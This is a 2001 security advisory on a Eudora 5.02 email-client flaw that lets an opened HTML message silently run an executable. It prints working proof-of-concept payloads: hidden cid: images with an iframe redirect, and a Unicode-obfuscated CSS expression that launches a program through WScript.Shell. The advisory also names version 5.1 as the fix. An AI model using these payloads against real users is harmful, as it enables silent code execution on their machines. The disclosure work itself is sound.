27 march 2001 Eudora Silent Delivery and Installation of Executables ------------------------------------------------------------------------ SUMMARY A vulnerability in Eudora mailing client enables attackers to send a special e-mail that will silently install and run an executable on the remote client. No client input is required other than opening an email using Eudora 5.02 - Sponsored Mode provided 'use Microsoft viewer' and 'allow executables in HTML content' are enabled. DETAILS Vulnerable systems: Eudora 5.02 - Sponsored Mode Immune systems: Eudora 5.1 Example: This can be exploited with relative ease as follows: 1. Create the following HTML mail message: <img SRC="cid:mr.malware.to.you" style="display:none"> <img id=W0W src="cid:malware.com" style="display:none"> <center><h6>YOU!DORA</h6></center> <IFRAME id=malware width=10 height=10 style="display:none" ></IFRAME> <script> // 18.03.01 http://www.malware.com malware.location.href=W0W.src </script> Where our first image is our executable. Our second image comprises a simple JavaScripting and ActiveX control. Once the mail message is opened in Eudora 5.02 - Sponsored Mode, the two 'embedded' images are silently and instantly transferred to the 'Embedded' folder. Our very simple JavaScript location.href then automatically calls our second image comprising the simple JavaScripting and ActiveX control (note: knowing the file names and locations is not necessary at all!), which is then displayed out of sight in our iframe. This in turn executes our *.exe. Because our *.exe and our simple JavaScripting and ActiveX control reside in the same folder (the so-called "Embedded' folder), and because it is automatically called to our iframe, everything is instant. 2. A working example incorporating a harmless *.exe file is available at: http://www.malware.com/you!DORA.txt 3. The following attack will work even if 'Allow executables in HTML content' is disabled. This is specifically constructed to fire the ActiveX warning so that it is visually illustrated (harmless WSH to fire telnet if you click ok). Note that the warning message is by design and only for illustrative purposes. <img SRC="cid:malware.com" height=2 width=2 STYLE="left:expression(document.write('\u0020 \u0020\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u0076\u0061\u0072 \u0020\u0077\u0073\u0068\u003d\u006e\u0065\u0077\u0020\u0041\u0063\u0074\u0069\u0076\u0065\u0058\u004f\u0062\u006a\u0065 \u0063\u0074\u0028\u0027\u0057\u0053\u0063\u0072\u0069\u0070\u0074\u002e\u0053\u0068\u0065\u006c\u006c\u0027\u0029 \u003b\u0020\u0020\u0077\u0073\u0068\u002e\u0052\u0075\u006e\u0028\u0027\u0074\u0065\u006c\u006e\u0065\u0074\u002e \u0065\u0078\u0065\u0027\u0029\u003b\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u003c\u0021\u002d \u002d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u006d\u0061\u006c\u0077\u0061\u0072\u0065\u002e\u0063\u006f\u006d\u0020\u0032\u0032\u002e\u0030\u0032\u002e\u0030\u0031\u0020 \u002d\u002d\u003e'))"> This attack was tested on win98, IE5.5, "Eudora 5.0.2 - Sponsored Mode", with "Microsoft Viewer" enabled, and "Allow executables in HTML content" disabled. Solution: This inline scripting hole has been fixed in Eudora 5.1. A beta of 5.1 can be found at http://www.eudora.com/betas/. The final release of 5.1 will be out very soon. ======================================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.